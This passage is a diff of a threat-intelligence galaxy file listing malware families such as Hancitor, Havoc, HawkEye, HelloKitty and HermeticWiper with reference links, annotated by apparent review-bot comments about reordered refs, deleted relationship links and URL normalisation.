"https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/",
- "https://blog.group-ib.com/hancitor-cuba-ransomware"
+ "https://www.vmray.com/cyber-security-blog/hancitor-multi-step-delivery-process-malware-analysis-spotlight/",
+ "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/",
+ "https://blog.group-ib.com/hancitor-cuba-ransomware",
+ "https://muha2xmad.github.io/unpacking/hancitor/",
+ "https://medium.com/@crovax/extracting-hancitors-configuration-with-ghidra-7963900494b5",
+ "https://twitter.com/TheDFIRReport/status/1359669513520873473",
+ "https://blog.group-ib.com/prometheus-tds",
+ "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/",
+ "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html",
+ "https://malware-traffic-analysis.net/2021/09/29/index.html",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-analysing-the-main-loader/",
+ "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/",
+ "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear",
+ "https://blog.group-ib.com/switching-side-jobs",
+ "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html",
+ "https://www.silentpush.com/blog/pivoting-finding-malware-domains-without-seeing-malicious-activity",
+ "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/",
+ "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/",
+ "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/",
+ "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/",
+ "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
+ "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618"
],
"synonyms": [
"Chanitor"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "ff0404a1-465f-4dd5-8b66-ee773628ca64",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "4166ab63-24b0-4448-92ea-21c8deef978d",
"value": "Hancitor"
},
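Review bot: the `related` array that linked this Hancitor cluster to dest-uuid ff0404a1-465f-4dd5-8b66-ee773628ca64 (type `similar`, tagged `estimative-language:likelihood-probability="almost-certain"`) is deleted and nothing in the hunk replaces it, so that cross-galaxy relationship is lost on regeneration; the same deletion appears in the Havex RAT, HDRoot and Helauto hunks below. If the generator cannot carry existing `related` entries over from the previous file, either merge them back in before committing or say in the commit message that dropping them is intentional, since downstream correlation on those UUIDs silently stops working otherwise.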
@@ -25729,8 +27226,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf"
+ "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf"
],
"synonyms": [],
"type": []
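Review bot: this hunk only swaps the order of the two existing refs without adding or removing anything, and the same pattern repeats in the Harnig, HDMR, HeaderTip, Helminth, Heriplor, Hermes, Hidden Bee, Hidden Tear and HideDRV hunks below, which points to the generator serialising `refs` from an unordered collection. Sorting the refs (or preserving Malpedia's source order) before writing the JSON would make future diffs show only genuine additions and removals instead of wholesale churn.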
@@ -25743,8 +27240,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig",
- "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html",
- "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html"
+ "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html",
+ "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html"
],
"synonyms": [
"Piptea"
@@ -25786,28 +27283,38 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat",
- "https://www.f-secure.com/weblog/archives/00002718.html",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-083a",
- "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/",
- "https://vblocalhost.com/uploads/VB2021-Slowik.pdf",
"https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://www.secureworks.com/research/threat-profiles/iron-liberty"
+ "https://www.f-secure.com/weblog/archives/00002718.html",
+ "https://www.secureworks.com/research/threat-profiles/iron-liberty",
+ "https://vblocalhost.com/uploads/VB2021-Slowik.pdf",
+ "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d7183f66-59ec-4803-be20-237b442259fc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a",
"value": "Havex RAT"
},
+ {
+ "description": "Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.havoc",
+ "https://www.zscaler.com/blogs/security-research/havoc-across-cyberspace",
+ "https://twitter.com/embee_research/status/1579668721777643520?s=20&t=nDJOv1Yf5mQZKCou7qMrhQ",
+ "https://github.com/HavocFramework/Havoc",
+ "https://www.youtube.com/watch?v=ErPKP4Ms28s",
+ "https://4pfsec.com/havoc-c2-first-look/"
+ ],
+ "synonyms": [
+ "Havokiz"
+ ],
+ "type": []
+ },
+ "uuid": "ddbcedee-ac3e-45d3-be2c-d7315d83e6a6",
+ "value": "Havoc"
+ },
{
"description": "HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.",
"meta": {
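Review bot: the new Havoc entry's ref `https://twitter.com/embee_research/status/1579668721777643520?s=20&t=nDJOv1Yf5mQZKCou7qMrhQ` carries Twitter's `s`/`t` share-tracking query parameters; the other Twitter refs in this file use the bare status URL (compare `https://twitter.com/TheDFIRReport/status/1359669513520873473` in the Hancitor entry), so strip the query string here to keep refs canonical and deduplicable. Separately, the Havex RAT `related` link to dest-uuid d7183f66-59ec-4803-be20-237b442259fc is removed without replacement, as noted on the Hancitor hunk.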
@@ -25826,26 +27333,27 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/",
- "https://www.secureworks.com/research/threat-profiles/gold-galleon",
- "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/",
"https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html",
- "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/",
- "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html",
- "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/",
- "http://www.secureworks.com/research/threat-profiles/gold-galleon",
- "https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/",
- "https://www.cyberbit.com/hawkeye-malware-keylogging-technique/",
+ "https://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/",
"https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html",
+ "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/",
+ "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/",
+ "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/HawkEye/HawkEye.md",
"https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
+ "https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html",
+ "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html",
"https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/",
- "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/HawkEye/HawkEye.md"
+ "https://www.cyberbit.com/hawkeye-malware-keylogging-technique/",
+ "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
+ "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html",
+ "http://www.secureworks.com/research/threat-profiles/gold-galleon"
],
"synonyms": [
"HawkEye",
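Review bot: after this reorder the refs still hold the same page twice under different URLs: `https://www.secureworks.com/research/threat-profiles/gold-galleon` alongside `http://www.secureworks.com/research/threat-profiles/gold-galleon`, and `https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/` alongside `https://www.cyberbit.com/hawkeye-malware-keylogging-technique/`; the Bitdefender ref also keeps its `?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter` tracking query. Normalising scheme and tracking parameters in the generator before deduplicating would collapse these. The only substantive change in this hunk is the added Check Point TrickGate write-up; everything else is reordering.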
@@ -25862,8 +27370,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr",
- "https://twitter.com/malwrhunterteam/status/1205096379711918080/photo/1",
- "http://id-ransomware.blogspot.com/2019/10/hdmr-ransomware.html"
+ "http://id-ransomware.blogspot.com/2019/10/hdmr-ransomware.html",
+ "https://twitter.com/malwrhunterteam/status/1205096379711918080/photo/1"
],
"synonyms": [
"GO-SPORT"
@@ -25884,15 +27392,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d2c1a439-585a-48bc-8176-c0c46dfac270",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "af8df5d7-cd8c-41ea-b9ec-b69ab7811e2d",
"value": "HDRoot"
},
@@ -25901,11 +27400,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.headertip",
- "https://blogs.blackberry.com/en/2022/04/threat-thursday-headertip-backdoor-shows-attackers-from-china-preying-on-ukraine",
- "https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip",
"https://cert.gov.ua/article/38097",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip"
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/",
+ "https://blogs.blackberry.com/en/2022/04/threat-thursday-headertip-backdoor-shows-attackers-from-china-preying-on-ukraine"
],
"synonyms": [],
"type": []
@@ -25923,15 +27422,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "7c05c816-481f-499e-9545-d48b635dc2eb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f",
"value": "Helauto"
},
@@ -25940,38 +27430,42 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hellobot",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt"
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
+ "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html"
],
"synonyms": [],
"type": []
},
"uuid": "64cecfd4-96fd-42a3-8537-fc0e041271a2",
- "value": "HelloBot"
+ "value": "HelloBot (Windows)"
},
{
- "description": "",
+ "description": "Unit42 states that HelloKitty is a ransomware family that first surfaced at the end of 2020, primarily targeting Windows systems. The malware family got its name due to its use of a Mutex with the same name: HelloKittyMutex. The ransomware samples seem to evolve quickly and frequently, with different versions making use of the .crypted or .kitty file extensions for encrypted files. Some newer samples make use of a Golang packer that ensures the final ransomware code is only loaded in memory, most likely to evade detection by security solutions.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty",
- "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/",
- "https://www.ic3.gov/Media/News/2021/211029.pdf",
- "https://twitter.com/fwosar/status/1359167108727332868",
- "https://blog.malwarebytes.com/threat-spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/",
- "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/",
- "https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks",
+ "https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html",
"https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
+ "https://twitter.com/fwosar/status/1359167108727332868",
+ "https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/",
+ "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/",
+ "https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
+ "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
+ "https://medium.com/proferosec-osm/static-unpacker-and-decoder-for-hello-kitty-packer-91a3e8844cb7",
+ "https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html",
+ "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
"https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.ic3.gov/Media/News/2021/211029.pdf",
+ "https://blog.malwarebytes.com/threat-spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/",
+ "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html",
+ "https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/",
"https://www.speartip.com/resources/fbi-hellokitty-ransomware-adds-ddos-to-extortion-arsenal/",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
"https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html",
- "https://medium.com/proferosec-osm/static-unpacker-and-decoder-for-hello-kitty-packer-91a3e8844cb7",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/",
- "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
- "https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html",
- "https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-is-targeting-vulnerable-sonicwall-devices/"
+ "https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-is-targeting-vulnerable-sonicwall-devices/",
+ "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/"
],
"synonyms": [
"KittyCrypt"
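Review bot: renaming the cluster `value` from `HelloBot` to `HelloBot (Windows)` while keeping uuid 64cecfd4-96fd-42a3-8537-fc0e041271a2 changes the galaxy tag string derived from the value, and `synonyms` for that entry stays `[]`, so events already tagged with the old name no longer match by name. Add `"HelloBot"` to that entry's `synonyms` so the previous name keeps resolving. The HelloKitty description is a welcome fill for the previously empty `""`; the Unit42 post it paraphrases is already in the refs list, so no further source is needed.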
@@ -25986,12 +27480,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth",
- "https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability",
- "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
- "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html",
- "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
- "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/",
"http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
+ "https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability",
+ "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/",
+ "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html",
"https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
],
"synonyms": [],
@@ -26032,9 +27526,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor",
"https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html",
- "https://vblocalhost.com/uploads/VB2021-Slowik.pdf",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
"https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks"
+ "https://vblocalhost.com/uploads/VB2021-Slowik.pdf"
],
"synonyms": [],
"type": []
@@ -26047,16 +27541,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html",
- "https://www.youtube.com/watch?v=9nuo-AGg4p4",
- "https://web.archive.org/web/20200922165625/https://dcso.de/2019/03/18/enterprise-malware-as-a-service/",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside",
"https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf",
"https://vxhive.blogspot.com/2020/11/deep-dive-into-hermes-ransomware.html",
+ "https://www.youtube.com/watch?v=9nuo-AGg4p4",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
"https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12",
- "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/"
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html",
+ "https://web.archive.org/web/20200922165625/https://dcso.de/2019/03/18/enterprise-malware-as-a-service/"
],
"synonyms": [],
"type": []
@@ -26069,73 +27563,79 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwiper",
- "https://brandefense.io/hermeticwiper-technical-analysis-report/",
- "https://thehackernews.com/2022/02/new-wiper-malware-targeting-ukraine.html",
- "https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket",
- "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia",
"https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
- "https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/",
- "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/",
+ "https://www.secureworks.com/blog/disruptive-hermeticwiper-attacks-targeting-ukrainian-organizations",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/defenders-blog-on-cyberattacks-targeting-ukraine.html",
+ "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://cluster25.io/2022/02/24/ukraine-analysis-of-the-new-disk-wiping-malware/",
"https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
- "https://learnsentinel.blog/2022/02/28/detecting-malware-kill-chains-with-defender-and-microsoft-sentinel/",
- "https://thehackernews.com/2022/02/putin-warns-russian-critical.html",
- "https://cloudsek.com/technical-analysis-of-the-hermetic-wiper-malware-used-to-target-ukraine/",
- "https://twitter.com/fr0gger_/status/1497121876870832128",
+ "https://community.riskiq.com/article/9f59cb85",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
+ "https://unit42.paloaltonetworks.com/preparing-for-cyber-impact-russia-ukraine-crisis/",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
"https://t3n.de/news/cyber-attacken-ukraine-wiper-malware-1454318/",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://thehackernews.com/2022/02/new-wiper-malware-targeting-ukraine.html",
+ "https://thehackernews.com/2022/02/putin-warns-russian-critical.html",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://learnsentinel.blog/2022/02/28/detecting-malware-kill-chains-with-defender-and-microsoft-sentinel/",
+ "https://twitter.com/fr0gger_/status/1497121876870832128",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware",
+ "https://blogs.blackberry.com/en/2022/03/threat-thursday-hermeticwiper",
+ "https://twitter.com/threatintel/status/1496578746014437376",
+ "https://cloudsek.com/technical-analysis-of-the-hermetic-wiper-malware-used-to-target-ukraine/",
+ "https://dgc.org/en/hermeticwiper-malware/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf",
"https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/",
"https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
- "https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/defenders-blog-on-cyberattacks-targeting-ukraine.html",
- "https://dgc.org/en/hermeticwiper-malware/",
- "https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/",
- "https://unit42.paloaltonetworks.com/preparing-for-cyber-impact-russia-ukraine-crisis/",
+ "https://www.brighttalk.com/webcast/15591/534324",
"https://eln0ty.github.io/malware%20analysis/HermeticWiper/",
- "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/",
- "https://www.mandiant.com/resources/information-operations-surrounding-ukraine",
- "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/",
- "https://securityintelligence.com/posts/new-destructive-malware-cyber-attacks-ukraine/",
- "https://www.englert.one/hermetic-wiper-reverse-code-engineering",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia",
- "https://blogs.blackberry.com/en/2022/03/threat-thursday-hermeticwiper",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
- "https://yoroi.company/research/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures/",
- "https://www.zdnet.com/article/microsoft-finds-foxblade-malware-on-ukrainian-systems-removing-rt-from-windows-app-store/",
- "https://elastic.github.io/security-research/intelligence/2022/03/01.hermeticwiper-targets-ukraine/article/",
- "https://cluster25.io/2022/02/24/ukraine-analysis-of-the-new-disk-wiping-malware/",
- "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/digging-into-hermeticwiper.html",
- "https://www.secureworks.com/blog/disruptive-hermeticwiper-attacks-targeting-ukrainian-organizations",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf",
- "https://www.deepinstinct.com/blog/hermeticwiper-malware-the-russian-ukrainian-cyber-war",
- "https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
- "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
